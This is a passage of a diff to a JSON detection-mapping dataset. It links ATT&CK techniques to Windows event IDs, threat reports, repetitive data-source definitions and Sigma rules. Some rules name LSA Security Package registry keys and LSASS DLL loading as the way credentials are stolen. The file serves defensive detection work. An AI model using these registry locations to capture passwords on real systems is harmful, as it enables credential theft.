], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [ + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + ] + }, + { + "technique_id": "T1011", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Security Support Provider (SSP) added to LSA configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "experimental", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "references": [ + "https://attack.mitre.org/techniques/T1101/", + "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/" + ], + "tags": [ + "attack.persistence", + "attack.t1011" + ], + "author": "iwillkeepwatch", + "date": "2019/01/18", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection_registry": { + "EventID": 13, + "TargetObject": [ + "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Security Packages", + "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages" + ] + }, + "exclusion_images": [ + { + "Image": "C:\\Windows\\system32\\msiexec.exe" + }, + { + "Image": "C:\\Windows\\syswow64\\MsiExec.exe" + } + ], + "condition": "selection_registry and not exclusion_images" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "User interface" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "User interface" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1177", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "experimental", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth", + "date": 